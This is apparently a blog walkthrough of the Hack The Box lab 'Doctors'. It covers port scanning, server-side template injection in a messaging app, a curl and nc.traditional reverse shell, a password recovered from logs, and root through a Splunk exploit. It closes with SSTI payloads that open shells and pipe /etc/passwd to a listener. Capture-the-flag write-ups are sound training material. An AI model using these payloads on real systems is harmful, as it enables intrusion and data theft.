Starting Nmap 7.80 ( ) at 2020-09-27 20:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating Ping Scan at 20:49
Scanning [4 ports]
Completed Ping Scan at 20:49, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:49
Scanning doctors.htb ( [1000 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Discovered open port 8089/tcp on
Completed SYN Stealth Scan at 20:50, 16.75s elapsed (1000 total ports)
Initiating Service scan at 20:50
Scanning 3 services on doctors.htb (
Completed Service scan at 20:50, 37.92s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against doctors.htb (
Retrying OS detection (try #2) against doctors.htb (
Initiating Traceroute at 20:51
Completed Traceroute at 20:51, 0.38s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:51
Completed Parallel DNS resolution of 2 hosts. at 20:51, 0.23s elapsed
NSE: Script scanning
Initiating NSE at 20:51
Completed NSE at 20:51, 12.07s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 2.48s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Nmap scan report for doctors.htb (
Host is up (0.31s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
| http-server-header: 
|   Apache/2.4.41 (Ubuntu)
|_  Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open  ssl/http Splunkd httpd
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after:  2023-09-06T15:57:27
| MD5:   db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 16.009 days (since Fri Sep 11 20:37:56 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
1   372.46 ms
2   371.49 ms doctors.htb (

NSE: Script Post-scanning.
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 78.94 seconds
           Raw packets sent: 2089 (95.608KB) | Rcvd: 46 (2.824KB)


Here we have nothing to check so lets go further and add doctors.htb to our hosts file and see what we have

Here we have login page Now lets see on

Port 8089

Here we have splunk normal website with not login creds and all

Now lets enumerate through login page of doctors.htb

Here we dont have anything except info@doctors.htb

Now lets create a user and log into the website

Now login

we see only mew message area lets check that

as we see above if we post anything we will get it printed out there

also we can try vulners but wont work here lets check for SSTI

because if we see that messaging apps can have XSS SSTI and many more as we dont have xss here so lets go for SSTI

Here we entered our basic payload to check for SSTI

to get that you can use this link

Here if we got 49 as our reply then it would be conformed that their is SSTI

but where do we have to check its output as it is not on this page

If you check source code we will have a another directory named /archive

Here in its source code we got 49 as reply

Now lets use some payloads to get shell using the above links

Lets try if we could use this basic command

└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 52932
GET / HTTP/1.1
User-Agent: curl/7.68.0
Accept: */*

lets add basic command ‘id’ in it

└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 52960
GET /uid=1001(web) HTTP/1.1
User-Agent: curl/7.68.0
Accept: */*

Here we got our output as web now lets get shell through this

as while using command for shell we are not allowed to use spaces so to bypass that we have a command “$IFS” for spaces tabs and all

but still nc wont work her so using a nudge from HTB forum we can use “nc.traditional”

whole command will look like this

curl http://10.10.14.XXX/$(‘nc.traditional’$IFS’10.10.14.XXX’$IFS’9004’$IFS’-e/bin/sh’)

└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
connect to [] from (UNKNOWN) [] 46942
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
python3 -c 'import pty;pty.spawn("/bin/bash")'

Here we go with our shell

Now here we need user shaun access for user flag

lets just download linpeas in and run that

web@doctor:/tmp$ wget
--2020-09-27 19:40:59--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 161297 (158K) [text/x-sh]
Saving to: ‘’          100%[===================>] 157,52K  34,1KB/s    in 4,6s    

2020-09-27 19:41:05 (34,1 KB/s) - ‘’ saved [161297/161297]

web@doctor:/tmp$ chmod +x
chmod +x
web@doctor:/tmp$ ./

So in log files we got some password like this using linpeas

[+] Finding passwords inside logs (limit 70)
Binary file /var/log/apache2/access.log.11.gz matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001.journal matches
Binary file /var/log/kern.log.2.gz matches
Binary file /var/log/kern.log.4.gz matches
Binary file /var/log/syslog.3.gz matches
/var/log/apache2/access.log: - - [27/Sep/2020:18:25:24 +0200] "GET /reset_password HTTP/1.1" 200 1814 "-" "gobuster/3.0.1"
/var/log/apache2/backup: - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
/var/log/auth.log.1:Sep 22 13:01:23 doctor sshd[1704]: Failed 


POST /reset_password?email=Guitar123

Just use this to get user shaun access


web@doctor:/tmp$ su shaun
su shaun
Password: Guitar123

shaun@doctor:/tmp$ cd
shaun@doctor:~$ cat user.txt
cat user.txt

Here we go with user flag

Now if we use pspy64 we will see that splunk is running by root

Now for that we have a git repo from where we can exploit that

here we just need to transfer the file to machine and run that binary

But when you will run you will see that there is some base64 encoded text in these lines

	     -H $'Host:' -H $'Connection: close' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'User-Agent: python-requests/2.18.4' -H $'Content-Length: 60' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Authorization: Basic c2hhdW46R3VpdGFyMTIz' \

YWRtaW46Y2hhbmdlbWUK >> admin:changeme

These are default creds for splunk which in our case wont work as they are changed so just base64 decode this

shaun:Guitar123 >> c2hhdW46R3VpdGFyMTIz

Just replace this and then run that exploit again


shaun@doctor:/tmp$ chmod +x
chmod +x
shaun@doctor:/tmp$ ./



[!] If all went well run /tmp/.tester/bin/shdoor -p for a root shell
[!] Run whoami if your prompt didn't change...

shaun@doctor:/tmp$ /tmp/.tester/bin/shdoor -p
/tmp/.tester/bin/shdoor -p
# is
/tmp/.tester/bin/shdoor: 1: is: not found
# id
uid=1002(shaun) gid=1002(shaun) euid=0(root) groups=1002(shaun)
# cd /root
cd /root
# cat root.txt
cat root.txt

Here we go with our root flag!!






Note : To try some SSTI payloads

${import os;os.popen("whoami").read() }


{%import socket,subprocess,os%}{{s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'}}

<script>document.location=; echo "hi" | /bin/nc.traditional 9004 -e / bin / bash#'

{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cat /etc/passwd | nc 9004')['read']() == 'chiv' %} a {% endif %}

They wont work here but they will work on another SSTI

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Up ↑

%d bloggers like this: